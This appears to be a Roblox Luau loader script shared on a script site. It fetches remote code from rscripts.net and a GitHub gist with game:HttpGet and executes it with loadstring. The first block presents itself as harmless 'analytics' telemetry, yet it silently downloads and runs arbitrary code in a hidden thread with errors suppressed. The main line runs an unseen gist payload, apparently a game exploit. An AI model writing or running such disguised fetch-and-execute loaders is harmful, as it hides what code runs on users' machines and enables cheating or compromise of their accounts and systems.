--[[rscripts:analytics:start]] -- Script analytics (enabled by the creator on rscripts.net). -- Runs in its own thread and cannot affect the script below. task.spawn(function() pcall(function() loadstring(game:HttpGet("https://rscripts.net/api/telemetry/client.lua?s=68cc432d62990e7030be487e"))() end) end) --[[rscripts:analytics:end]] loadstring(game:HttpGet("https://gist.githubusercontent.com/shogunprime/d2c8387f585b9ff99241f61b32f4403d/raw/297cbf18fc2cca1dfb76b8f2561438db1f938506/Luau"))()